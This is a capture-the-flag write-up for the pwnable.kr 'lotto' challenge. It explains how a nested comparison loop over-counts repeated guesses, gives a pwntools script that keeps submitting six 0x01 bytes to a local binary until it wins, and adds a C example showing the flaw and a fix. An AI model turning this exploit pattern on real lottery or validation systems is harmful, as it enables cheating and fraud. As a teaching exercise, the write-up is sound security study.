Neocortex 🧠

Pwnable.kr Lotto

Last updated Aug 20, 2022

Here we have a lotto program. When it checks whether our input matches the drawn numbers, it uses the following piece of code:

int match = 0, j = 0;
for(i=0; i<6; i++){
    for(j=0; j<6; j++){
        if(lotto[i] == submit[j]){
            match++;
        }
    }
}

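The intent is to check whether the numbers match regardless of order. But the nested loop compares every byte of lotto against every byte of submit, so a repeated value in our input is counted once per repetition. If we provide an array of all ones and there is a one in the random array, we get a pass.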

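from pwn import *

p = process("./lotto")
while True:
    # Read up to the menu and send choice 1
    p.recvuntil(b"-")
    p.clean()
    p.sendline(b"1")
    p.recvuntil(b"bytes :")
    # Six identical bytes: a single one in the random array matches all of them
    p.sendline(b"\x01\x01\x01\x01\x01\x01")
    p.recvuntil(b"Start!\n")
    s = p.recvline()

    # Any reply other than the losing message ends the loop
    if s != b'bad luck...\n':
        print(s)
        break

p.close()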
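The counting flaw described above next to one way to fix it, as an added example that is not part of the original write-up or the challenge source. The function names, the sample arrays and the 1..45 value range are assumptions made for illustration.

```c
#include <stdio.h>

#define N 6
#define MAX_VAL 45 /* assumption: numbers are drawn from 1..45 */

/* Constructed sample data */
static const unsigned char DRAW[N]   = {1, 17, 23, 30, 41, 45};
static const unsigned char ONES[N]   = {1, 1, 1, 1, 1, 1};
static const unsigned char HONEST[N] = {45, 41, 30, 23, 17, 1};

/* The page's check: every lotto byte is compared with every submitted byte. */
int count_matches_flawed(const unsigned char *lotto, const unsigned char *submit) {
    int match = 0;
    for (int i = 0; i < N; i++)
        for (int j = 0; j < N; j++)
            if (lotto[i] == submit[j])
                match++;
    return match;
}

/* Hardened: reject out-of-range or repeated guesses, then count each drawn
 * number at most once. Returns -1 for an invalid submission. */
int count_matches_fixed(const unsigned char *lotto, const unsigned char *submit) {
    unsigned char picked[MAX_VAL + 1] = {0};
    int match = 0;
    for (int j = 0; j < N; j++) {
        if (submit[j] < 1 || submit[j] > MAX_VAL || picked[submit[j]])
            return -1;
        picked[submit[j]] = 1;
    }
    for (int i = 0; i < N; i++) {
        if (lotto[i] <= MAX_VAL && picked[lotto[i]]) {
            match++;
            picked[lotto[i]] = 0; /* a duplicate in the draw counts once */
        }
    }
    return match;
}

int main(void) {
    printf("flawed, all ones: %d\n", count_matches_flawed(DRAW, ONES));
    printf("fixed,  all ones: %d\n", count_matches_fixed(DRAW, ONES));
    printf("fixed,  honest:   %d\n", count_matches_fixed(DRAW, HONEST));
    return 0;
}
```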
